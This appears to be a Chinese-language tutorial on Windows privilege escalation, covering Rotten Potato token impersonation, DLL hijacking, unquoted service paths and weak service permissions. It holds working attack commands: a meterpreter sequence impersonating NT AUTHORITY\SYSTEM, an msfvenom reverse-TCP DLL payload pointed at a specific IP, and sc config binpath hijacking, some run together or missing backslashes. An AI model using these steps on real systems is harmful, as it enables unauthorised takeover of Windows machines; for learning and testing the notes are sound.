提权-win烂土豆&dll劫持&引号路径&服务权限

以下几种提权方法的适合环境（web用户/本机用户）因方法而不同，有的方法在两种权限下都适用，一般也都是本机权限大于webshell权限。

win 烂土豆提权（MS16-075）：

烂土豆(Rotten Potato)提权是一个本地提权，是针对本地用户的，不能用于域用户，webshell环境或本地普通用户环境都可以适用。
过程：msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号：CVE-2016-3225
)。

我们是用之前的令牌窃取提权无法成功，因为webshell用户权限太低，无法窃取到system用户权限,我们此时可以配合烂土豆来提权。
 
补充下之前令牌窃取的知识：
Windows中有两种令牌，一种是Delegation Token，是为交互式登录（比如登录进系统或者通过远程桌面连接到系统）创建的。另一种是Impersonmate Token（模仿令牌），它是为非交互式会话创建的。

利用一个shell脚本查看用户权限上传生成的后门并执行：
配合令牌窃取来进行，就是一套流程，从websehll权限到system权限：

upload /root/potato.exe C:UsersPubliccd C:\Users\Publicuse incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -uimpersonate_token "NT AUTHORITY\SYSTEM"

参考：
windows提权方法总结
权限提升篇-令牌窃取与烂土豆提权
https://blog.csdn.net/qq_41874930/article/details/109766105

win dll劫持：

原理：Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在，则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。

通常，Windows 应用程序有其预定义好的搜索 DLL 的路径，它会根据下面的顺序进行搜索：
1、应用程序加载的目录
2、C:WindowsSystem32
3、C:WindowsSystem
4、C:Windows
5、当前工作目录 Current Working Directory，CWD
6、在 PATH 环境变量的目录（先系统后用户）

过程：信息收集(搜集服务器上其他的第三方应用)-进程调试(分析这个程序启动时调用那些dll)-制作dll并上传-替换dll-启动应用后成功。（因为系统dll运行时根本无法查看，更不可能替换了，本地调试）

比如火绒剑分析：

msf利用：

msfvenom -p windows/meterpreter/reverse_tcplhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll

替换dll,MSF监听,当软件执行时调用dll,反弹成功。

弊端：
dll劫持提权需要有特定软件应用并能替换以及管理员要启用才行，三个条件缺一不可。
AlwaysInstallElevated提权默认禁用配置,利用成功机会很少。所以说此方法比较鸡肋。

Win-不带引号服务路径配合 MSF（Web,本地权限）：

原理：当 Windows 服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完
整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系
统将会执行找到的空格分隔的服务路径的第一个实例。

过程：检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

服务有没有引号，有引号的就正常，没有引号的话路径有没有空格，这样可能导致安全问题，比如空格后边被利用被当成参数执行，程序只执行参数之前的。

检测引号命令

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v ""

启用程序时我们用msf监听就能发现回显，并且启动服务的时候都是system权限启动。

弊端：
1.引号与空格，满足这个条件的就不太多。
2.是否第三方应用并且能启用/重启服务，且路径无引号，系统程序一般替换不了。

win-不安全的服务权限配合MSF（本地权限）：

原理：即使正确引用了服务路径，也可能存在其他漏洞。由于管理配置错误，用户可能对服务拥有
过多的权限，例如，可以直接修改它导致重定向执行文件。

过程：检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

accesschk文件检测用户权限：

accesschk.exe -uwcqv "administrators" *sc config "NewServiceName" binpath="C:Program.exe"sc start "NewServiceName"

AlwaysInstallElevated 提权：默认禁用配置，利用成功机会很小。

参考：
Windows提权命令参考

// 这些提权方法大多都是msf、上传文件来进行，学到的是方法/思路，但真实环境利用自然没那么简单，涉及到免杀、waf等等。